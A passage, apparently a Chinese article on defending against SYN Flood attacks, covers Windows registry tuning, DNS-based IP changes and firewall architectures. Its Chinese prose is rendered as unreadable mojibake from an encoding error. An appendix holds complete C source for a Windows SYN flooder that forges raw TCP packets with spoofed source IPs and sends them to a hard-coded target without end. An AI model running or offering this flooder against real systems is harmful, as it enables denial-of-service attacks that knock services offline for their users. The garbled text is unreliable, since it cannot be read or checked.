¹LTcpMaxHalfOpenRetriedªº³]¸m¡A¨t²Î·|»{¬°¦Û¤v¨ü¨ì¤FSYN Flood§ðÀ»¡A¦¹®É³]¸m¦b SynAttackProtectÁä­È¤¤ªº¿ï¶µ¶}©l§@¥Î¡ASYN Timeout®É¶¡³Q´îµu¡ASYN-ACKªº­«¸Õ¦¸¼Æ ´î¤Ö¡A¨t²Î¤]·|¦Û°Ê¹ï½w½Ä°Ï¤¤ªº³ø¤å¶i¦æ©µ®É¡AÁקK¹ïTCP/IP°ïÅ|³y¦¨¹L¤jªº½ÄÀ»¡A ¤O¹Ï±N§ðÀ»¦M®`´î¨ì³Ì§C¡F¦pªG§ðÀ»±j«×¤£Â_¼W¤j¡A¶W¹L¤FTcpMaxHalfOpen­È¡A¦¹®É¨t²Î¤w ¸g¤£¯à´£¨Ñ¥¿±`ªºªA°È¤F¡A §ó­«­nªº¬O«OÃÒ¨t²Î¤£·|±Y¼ì¡A©Ò¥H¨t²Î±N·|¥á±ó¥ô¦ó¶W¥XTcpMaxHalfOpen­È½d³òªºSYN³ø ¤å ¡]À³¸Ó¬O¨Ï¥ÎÀH¾÷¥á¥]µ¦²¤¡^¡A«OÃÒ¨t²ÎªºÃ­©w©Ê¡C ©Ò¥H¡A¹ï©ó»Ý­n¶i¦æSYN§ðÀ»«OÅ@ªº¨t²Î¡A§Ú­Ì¥i¥H´ú¸Õ/¹w´ú¤@¤U³X°Ý®p­È®É´Áªº¥b³s±µ ¥´¶}¶q¡A¥H¨ä§@¬°°Ñ¦Ò³]©wTcpMaxHalfOpenRetriedªº­È¡]«O¯d¤@©wªº¾l¶q¡^¡AµM«á¦A¥H cpMaxHalfOpenRetriedªº1.25­¿§@¬°TcpMaxHalfOpen­È¡A³o¼Ë¥i¥H³Ì¤j­­«×¦aµo´§WIN2K ¦Û¨­ªºSYN§ðÀ»«OÅ@¾÷¨î¡C ³q¹L³]¸mµù¥Uªí¨¾¿mSYN Flood§ðÀ»¡A±Ä¥Îªº¬O¡§®Á¥´¡¨ªºµ¦²¤¡AµL½×¨t²Î¦p¦ó±j¤j¡A©l ²×¤£¯à¥ú¾a®Á¥´¤ä¼µ¤U¥h¡A°£¤F®Á¥´¤§¥~¡A¡§°hÅý¡¨¤]¬O¤@ºØ¤ñ¸û¦³®Äªº¤èªk¡C °hÅýµ¦²¤¬O°ò©óSYN Flood§ðÀ»¥N½Xªº¤@­Ó¯Ê³´¡A§Ú­Ì­«·s¨Ó¤ÀªR¤@¤USYN Flood§ðÀ»ªÌªº ¬yµ{¡GSYN Floodµ{¦¡¦³¨âºØ§ðÀ»¤è¦¡¡A°ò©óIPªº©M°ò©ó¥\¯àÅܼƦWºÙªº¡A«eªÌ¬O§ðÀ»ªÌ ¦Û¤v¶i¦æ¥\¯àÅܼƦWºÙ¸ÑªR¨Ã±NIP¦ì§}¶Ç»¼µ¹§ðÀ»µ{¦¡¡A«áªÌ¬O§ðÀ»µ{¦¡¦Û°Ê¶i¦æ¥\¯àÅÜ ¼Æ¦WºÙ¸ÑªR¡A¦ý¬O¥¦­Ì¦³¤@ÂI¬O¬Û¦Pªº¡A´N¬O¤@¥¹§ðÀ»¶}©l¡A±N¤£·|¦A¶i¦æ¥\¯àÅܼƦWºÙ ¸ÑªR¡A§Ú­Ìªº¤Á¤JÂI¥¿¬O³oùØ¡G°²³]¤@¥x¦øªA¾¹¦b¨ü¨ìSYN Flood§ðÀ»«á¨³³t§ó´«¦Û¤vªº IP¦ì§}¡A¨º»ò§ðÀ»ªÌ¤´¦b¤£Â_§ðÀ»ªº¥u¬O¤@­ÓªÅªºIP¦ì§}¡A¨Ã¨S¦³¥ô¦ó¥D¾÷¡A¦Ó¨¾¿m¤è¥u ­n±NDNS¸ÑªR§ó§ï¨ì·sªºIP¦ì§}´N¯à¦b«Üµuªº®É¶¡¤º¡]¨ú¨M©óDNSªº¨ê·s®É¶¡¡^«ì´_¥Î¤á³q¹L ¥\¯àÅܼƦWºÙ¶i¦æªº¥¿±`³X°Ý¡C ¬°¤F°g´b§ðÀ»ªÌ¡A§Ú­Ì¬Æ¦Ü¥i¥H©ñ¸m¤@¥x¡§Ä묹¡¨¦øªA¾¹Åý§ðÀ»ªÌº¡¨¬©ó§ðÀ»ªº¡§®ÄªG¡¨ ¡]¥Ñ©óDNS½w½Äªº­ì¦]¡A¥u­n§ðÀ»ªÌªº¬yÄý¾¹¤£­«°_¡A¥L³X°Ýªº¤´µM¬O­ì¥ýªºIP¦ì§}¡^¡C ¦P¼Ëªº­ì¦]¡A¦b²³¦hªº­t¸ü§¡¿Å¬[ºc¤¤¡A°ò©óDNS¸ÑªRªº­t¸ü§¡¿Å¥»¨­´N¾Ö¦³¹ïSYN Floodªº§K¬Ì¤O¡A°ò©óDNS¸ÑªRªº­t¸ü§¡¿Å¯à±N¥Î¤áªº½Ð¨D¤À°t¨ì¤£¦PIPªº¦øªA¾¹¥D¾÷¤W¡A §ðÀ»ªÌ§ðÀ»ªº¥Ã»·¥u¬O¨ä¤¤¤@¥x¦øªA¾¹¡AÁöµM»¡§ðÀ»ªÌ¤]¯à¤£Â_¥h¶i¦æDNS½Ð¨D±q¦Ó¥´¯} ³oºØ¡§°hÅý¡¨µ¦²¤¡A¦ý¬O¤@¨Ó³o¼Ë¼W¥[¤F§ðÀ»ªÌªº¦¨¥»¡A¤G¨Ó¹L¦hªºDNS½Ð¨D¥i¥HÀ°§U§Ú ­Ì°l¬d§ðÀ»ªÌªº¯u¥¿Âܸñ¡]DNS½Ð¨D¤£¦P©óSYN§ðÀ»¡A¬O»Ý­nªð¦^¸ê®Æªº¡A©Ò¥H«ÜÃø¶i¦æ IP °°¸Ë¡^¡C ¹ï©ó¨¾¤õÀð¨Ó»¡¡A¨¾¿mSYN Flood§ðÀ»ªº¤èªk¨ú¨M©ó¨¾¤õÀð¤u§@ªº°ò¥»­ì²z¡A¤@¯ë»¡¨Ó¡A ¨¾¤õÀð¥i¥H¤u§@¦bTCP¼h¤§¤W©ÎIP¼h¤§¤U¡A¤u§@¦bTCP¼h¤§¤Wªº¨¾¤õÀðºÙ¬°¹h¹D«¬¨¾¤õÀð¡A ¹h¹D«¬¨¾¤õÀð»P¦øªA¾¹¡B«È¤á¾÷¤§¶¡ªºÃö«Y¦p¤U¹Ï©Ò¥Ü¡G ¥~³¡TCP³s±µ ¤º³¡TCP³s±µ [«È¤á¾÷] =================>[¨¾¤õÀð] =================>[¦øªA¾¹] ¦p¤W¹Ï©Ò¥Ü¡A«È¤á¾÷»P¦øªA¾¹¤§¶¡¨Ã¨S¦³¯u¥¿ªºTCP³s±µ¡A«È¤á¾÷»P¦øªA¾¹¤§¶¡ªº©Ò¦³¸ê ®Æ¥æ´«³£¬O³q¹L¨¾¤õÀð¥N²zªº¡A¥~³¡ªºDNS¸ÑªR¤]¦P¼Ë«ü¦V¨¾¤õÀð¡A©Ò¥H¦pªGºô¯¸³Q§ðÀ» ¡A¯u¥¿¨ü¨ì§ðÀ»ªº¬O¨¾¤õÀð¡A³oºØ¨¾¤õÀðªºÀuÂI¬Oí©w©Ê¦n¡A§Ü¥´À»¯à¤O±j¡A¦ý¬O¦]¬°©Ò ¦³ªºTCP³ø¤å³£»Ý­n¸g¹L¨¾¤õÀðÂàµo¡A©Ò¥H®Ä²v¤ñ¸û§C¥Ñ©ó«È¤á¾÷¨Ã¤£ª½±µ»P¦øªA¾¹«Ø¥ß ³s±µ¡A¦bTCP³s±µ¨S¦³§¹¦¨®É¨¾¤õÀ𤣷|¥h¦V«á»Oªº¦øªA¾¹«Ø¥ß·sªºTCP³s±µ¡A©Ò¥H§ðÀ»ªÌ µLªk¶V¹L¨¾¤õÀ𪽱µ§ðÀ»«á»O¦øªA¾¹¡A¥u­n¨¾¤õÀ𥻨­°µªº¨¬°÷±j§§¡A³oºØ¬[ºc¥i¥H©è§Ü ¬Û·í±j«×ªºSYN Flood§ðÀ»¡C¦ý¬O¥Ñ©ó¨¾¤õÀð¹ê»Ú«Ø¥ß TCP³s±µ¼Æ¬°¥Î¤á³s±µ¼Æªº¨â­¿¡]¨¾ ¤õÀð¨âºÝ³£»Ý­n«Ø¥ßTCP³s±µ¡^¡A ¦P®É¤S¥N²z¤F©Ò¦³ªº¨Ó¦Û¥Î¤áºÝªºTCP½Ð¨D©M¸ê®Æ¶Ç°e¡A¦b¨t²Î³X°Ý¶q¸û¤j®É¡A¨¾¤õÀð¦Û¨­ ªº­t²ü·|¤ñ¸û °ª¡A©Ò¥H³oºØ¬[ºc¨Ã¤£¯à¾A¥Î©ó¤j«¬ºô¯¸¡C¡]§Ú·Pı¡A¹ï©ó³o¼Ëªº¨¾¤õÀð¬[ºc¡A¨Ï¥ÎTCP STATE§ðÀ»¦ô­p·|¬Û·í¦³®Ä:¡^ ¤u§@¦bIP¼h©ÎIP¼h¤§¤Uªº¨¾¤õÀð¡]¸ô¥Ñ«¬¨¾¤õÀð¡^¤u§@­ì²z¦³©Ò¤£¦P¡A¥¦»P¦øªA¾¹¡B«È¤á¾÷ ªºÃö«Y¦p¤U¹Ï©Ò¥Ü¡G [¨¾¤õÀð] ¸ê®Æ¥]­×§ïÂàµo [«È¤á¾÷]========|=======================>[¦øªA¾¹] TCP³s±µ «È¤á¾÷ª½±µ»P¦øªA¾¹¶i¦æTCP³s±µ¡A¨¾¤õÀð°_ªº¬O¸ô¥Ñ¾¹ªº§@¥Î¡A¥¦ºIÀò©Ò¦³³q¹Lªº¥]¨Ã ¶i¦æ¹LÂo¡A³q¹L¹LÂoªº¥]³QÂàµoµ¹¦øªA¾¹¡A¥~³¡ªºDNS¸ÑªR¤]ª½±µ«ü¦V¦øªA¾¹¡A³oºØ¨¾¤õ ÀðªºÀuÂI¬O®Ä²v°ª¡A¥i¥H¾AÀ³100Mbps-1Gbpsªº¬y¶q¡A¦ý¬O³oºØ¨¾¤õÀð¦pªG°t¸m¤£·í¡A¤£ ¶È¥i¥HÅý§ðÀ»ªÌ¶V¹L¨¾¤õÀ𪽱µ§ðÀ»¤º³¡¦øªA¾¹¡A¬Æ¦Ü¦³¥i¯à©ñ¤j§ðÀ»ªº±j«×¡A¾É­P¾ã­Ó¨t ²Î±Y¼ì¡C ¦b³o¨âºØ°ò¥»¼Ò«¬¤§¥~¡A¦³¤@ºØ·sªº¨¾¤õÀð¼Ò«¬¡A§Ú­Ó¤H»{¬°ÁÙ¬O¤ñ¸û¥©§®ªº¡A¥¦¶°¤¤¤F ¨âºØ¨¾¤õÀðªºÀu¶Õ¡A³oºØ¨¾¤õÀ𪺤u§@­ì²z¦p¤U©Ò¥Ü¡G ²Ä¤@¶¥¬q¡A«È¤á¾÷½Ð¨D»P¨¾¤õÀð«Ø¥ß³s±µ¡G SYN SYN+ACK ACK [«È¤á¾÷]---- >[¨¾¤õÀð] => [¨¾¤õÀð]-------- >[«È¤á¾÷] => [«È¤á¾÷]--- >[¨¾¤õÀð] ²Ä¤G¶¥¬q¡A¨¾¤õÀ𰰸˦¨«È¤á¾÷»P«á»Oªº¦øªA¾¹«Ø¥ß³s±µ [¨¾¤õÀð]< =========== >[¦øªA¾¹] TCP³s±µ ²Ä¤T¶¥¬q¡A¤§«á©Ò¦³±q«È¤á¾÷¨ÓªºTCP³ø¤å¨¾¤õÀ𳣪½±µÂàµoµ¹«á»Oªº¦øªA¾¹ ¨¾¤õÀðÂàµo [«È¤á¾÷]< ======|======= >[¦øªA¾¹] TCP³s±µ ³oºØµ²ºc§l¨ú¤F¤W¨âºØ¨¾¤õÀðªºÀuÂI¡A¬J¯à§¹¥þ±±¨î©Ò¦³ªºSYN³ø¤å¡A¤S¤£»Ý­n¹ï©Ò¦³ªº TCP¸ê®Æ³ø¤å¶i¦æ¥N²z¡A¬O¤@ºØ¨â¥þ¨ä¬üªº¤èªk¡C ªñ¨Ó¡A°ê¥~©M°ê¤ºªº¤@¨Ç¨¾¤õÀð¼t°Ó¶}©l¬ã¨s±a¼e±±¨î§Þ³N¡A¦pªG¯à¯u¥¿°µ¨ìÄY®æ±±¨î¡B ¤À°t±a¼e¡A´N¯à«Ü¤jµ{«×¤W¨¾¿mµ´¤j¦h¼Æªº©Úµ´ªA°È§ðÀ»¡A§Ú­ÌÁÙ¬O«ø¥Ø¥H«Ý§a¡C ªþ¿ý¡GWin2000¤UªºSYN Floodµ{¦¡ §ï½s¦ÛLinux¤UZakath½s¼gªºSYN Flooder ½sĶÀô¹Ò¡GVC++6.0,½sĶ®É»Ý­n¥]§tws2_32.lib ////////////////////////////////////////////////////////////////////////// // // // SYN Flooder For Win2K by Shotgun // // // // THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath // // THANX Lion Hook FOR PROGRAM OPTIMIZATION // // // // Released: [2001.4] // // Author: [Shotgun] // // Homepage: // // [http://IT.Xici.Net] // // [http://WWW.Patching.Net] // // // ////////////////////////////////////////////////////////////////////////// #include #include #include #include #define SEQ 0x28376839 #define SYN_DEST_IP "192.168.15.250"//³Q§ðÀ»ªºIP #define FAKE_IP "10.168.150.1" //°°¸ËIPªº°_©l­È¡A¥»µ{¦¡ªº°°¸ËIPÂл\¤@­ÓBÃþºô¬q #define STATUS_FAILED 0xFFFF //¿ù»~ªð¦^­È typedef struct _iphdr //©w¸qIP­º³¡ { unsigned char h_verlen; //4¦ì­º³¡ªø«×,4¦ìIPª©¥»¸¹ unsigned char tos; //8¦ìªA°ÈÃþ«¬TOS unsigned short total_len; //16¦ì¤¸Á`ªø«×¡]¦ì¤¸²Õ¡^ unsigned short ident; //16¦ì¤¸¼ÐÃÑ unsigned short frag_and_flags; //3¦ì¤¸¼Ð»x¦ì¤¸ unsigned char ttl; //8¦ì¥Í¦s®É¶¡ TTL unsigned char proto; //8¦ì¤¸¨óij (TCP, UDP ©Î¨ä¥L) unsigned short checksum; //16¦ìIP­º³¡®ÕÅç©M unsigned int sourceIP; //32¦ì·½IP¦a§} unsigned int destIP; //32¦ì¤¸¥ØªºIP¦ì§} }IP_HEADER; struct //©w¸qTCP°°­º³¡ { unsigned long saddr; //·½¦a§} unsigned long daddr; //¥Øªº¦a§} char mbz; char ptcl; //¨óijÃþ«¬ unsigned short tcpl; //TCPªø«× }psd_header; typedef struct _tcphdr //©w¸qTCP­º³¡ { USHORT th_sport; //16¦ì·½°ð USHORT th_dport; //16¦ì¤¸¥Øªº°ð unsigned int th_seq; //32¦ì§Ç¦C¸¹ unsigned int th_ack; //32¦ì½T»{¸¹ unsigned char th_lenres; //4¦ì­º³¡ªø«×/6¦ì«O¯d¦r unsigned char th_flag; //6¦ì¤¸¼Ð»x¦ì¤¸ USHORT th_win; //16¦ì¤¸µ¡¤f¤j¤p USHORT th_sum; //16¦ì®ÕÅç©M USHORT th_urp; //16¦ì¤¸ºò«æ¸ê®Æ°¾²¾¶q }TCP_HEADER; //CheckSum:­pºâ®ÕÅç©Mªº¤l¨ç¼Æ USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } // SynFlood¥D¨ç¼Æ int main() { int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; int TimeOut=2000,SendSEQ=0; char SendBuf[128]={0}; char RecvBuf[65535]={0}; WSADATA wsaData; SOCKET SockRaw=(SOCKET)NULL; struct sockaddr_in DestAddr; IP_HEADER ip_header; TCP_HEADER tcp_header; //ªì©l¤ÆSOCK_RAW if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); ExitProcess(STATUS_FAILED); } SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)); if (SockRaw==INVALID_SOCKET){ fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); ExitProcess(STATUS_FAILED); } flag=TRUE; //³]¸mIP_HDRINCL¥H¦Û¤v¶ñ¥RIP­º³¡ ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)) ; If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); __try{ //³]¸mµo°e¶W®É ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof( TimeOut)); if(ErrorCode==SOCKET_ERROR){ fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError()); __leave; } memset(&DestAddr,0,sizeof(DestAddr)); DestAddr.sin_family=AF_INET; DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); FakeIpNet=inet_addr(FAKE_IP); FakeIpHost=ntohl(FakeIpNet); //¶ñ¥RIP­º³¡ ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //°ª¥|¦ìIPª©¥»¸¹¡A§C¥|¦ì­º³¡ªø«× ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16¦ì¤¸Á`ªø«× ¡]¦ì¤¸²Õ¡^ ip_header.ident=1; //16¦ì¤¸¼ÐÃÑ ip_header.frag_and_flags=0; //3¦ì¤¸¼Ð»x¦ì¤¸ ip_header.ttl=128; //8¦ì¥Í¦s®É¶¡TTL ip_header.proto=IPPROTO_TCP; //8¦ì¤¸¨óij(TCP,UDP¡K) ip_header.checksum=0; //16¦ìIP­º³¡®ÕÅç©M ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32¦ì·½IP¦a§} ip_header.destIP=inet_addr(SYN_DEST_IP); //32¦ì¤¸¥ØªºIP¦ì§} //¶ñ¥RTCP­º³¡ tcp_header.th_sport=htons(7000); //·½°ð¸¹ tcp_header.th_dport=htons(8080); //¥Øªº°ð¸¹ tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN§Ç¦C¸¹ tcp_header.th_ack=0; //ACK§Ç¦C¸¹¸m¬°0 tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCPªø«×©M«O¯d¦ì tcp_header.th_flag=2; //SYN ¼Ð»x tcp_header.th_win=htons(16384); //µ¡¤f¤j¤p tcp_header.th_urp=0; //°¾²¾ tcp_header.th_sum=0; //®ÕÅç©M //¶ñ¥RTCP°°­º³¡¡]¥Î©ó­pºâ®ÕÅç©M¡A¨Ã¤£¯u¥¿µo°e¡^ psd_header.saddr=ip_header.sourceIP; //·½¦a§} psd_header.daddr=ip_header.destIP; //¥Øªº¦a§} psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP; //¨óijÃþ«¬ psd_header.tcpl=htons(sizeof(tcp_header)); //TCP­º³¡ªø«× while(1) { //¨Cµo°e10,240­Ó³ø¤å¿é¥X¤@­Ó¼Ð¥Ü²Å printf("."); for(counter=0;counter<10240;counter++){ if(SendSEQ++==65536) SendSEQ=1; //§Ç¦C¸¹°j°é //§ó§ïIP­º³¡ ip_header.checksum=0; //16¦ìIP­º³¡®ÕÅç©M ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32¦ì·½IP¦a§} //§ó§ïTCP­º³¡ tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN§Ç¦C¸¹ tcp_header.th_sum=0; //®ÕÅç©M //§ó§ïTCP Pseudo Header psd_header.saddr=ip_header.sourceIP; //­pºâTCP®ÕÅç©M¡A­pºâ®ÕÅç©M®É»Ý­n¥]¬ATCP pseudo header memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_ header)); //­pºâIP®ÕÅç©M memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); datasize=sizeof(ip_header)+sizeof(tcp_header); ip_header.checksum=checksum((USHORT *)SendBuf,datasize); //¶ñ¥Rµo°e½w½Ä°Ï memcpy(SendBuf,&ip_header,sizeof(ip_header)); //µo°eTCP³ø¤å ErrorCode=sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr*) &DestAddr, sizeof(DestAddr)); if (ErrorCode==SOCKET_ERROR) printf("\nSend Error:%d\n",GetLastError()); }//End of for }//End of While }//End of try __finally { if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); WSACleanup(); } return 0; }